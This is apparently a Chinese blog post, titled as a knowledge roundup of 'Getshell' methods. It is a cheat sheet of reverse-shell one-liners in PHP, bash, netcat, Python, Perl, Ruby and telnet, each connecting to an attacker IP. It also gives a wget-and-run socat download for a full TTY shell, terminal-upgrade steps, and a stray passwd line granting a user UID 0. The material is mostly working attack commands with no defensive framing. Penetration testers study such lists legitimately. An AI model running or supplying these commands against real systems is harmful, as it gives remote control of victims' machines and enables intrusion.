天天看點

【知識整理】Getshell方法整理Getshell

Getshell

php

php -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
           

bash

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
           

netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f;
           
nc -e /bin/sh 1234   #不同版本的nc不一定支援-e選項
           
#不能使用 -e

		mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
		
		/bin/sh | nc attackerip 4444
		
		rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
           

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
           

perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
           
#不依賴于/bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
           
#windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
           

ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
           
#不依賴/bin/sh

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
           
#windows

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
           

telnet

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
           

python 獲得互動shell

python -c "import pty;pty.spawn('/bin/bash')"
           

socat獲得完整的tty

當反彈方沒有socat時,可以先下載下傳再執行
		wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash - li',pty,stderr,setsid,sigint,sane tcp:ip:1234

當反彈方有socat時,直接執行		
		socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:47.101.158.147:1234

接受方 : socat file:`tty`,raw,echo=0 tcp-listen:1234
		

tommy:x:0:500:tommy:/home/tommy:/bin/bash
           

使用 stty 選項

# In reverse shell
	$ python -c 'import pty; pty.spawn("/bin/bash")'
	Ctrl-Z
	# In Kali
	$ stty raw -echo
	$ fg
	# In reverse shell
	$ reset
	$ export SHELL=bash
	$ export TERM=xterm-256color
	$ stty rows <num> columns <cols>
           

繼續閱讀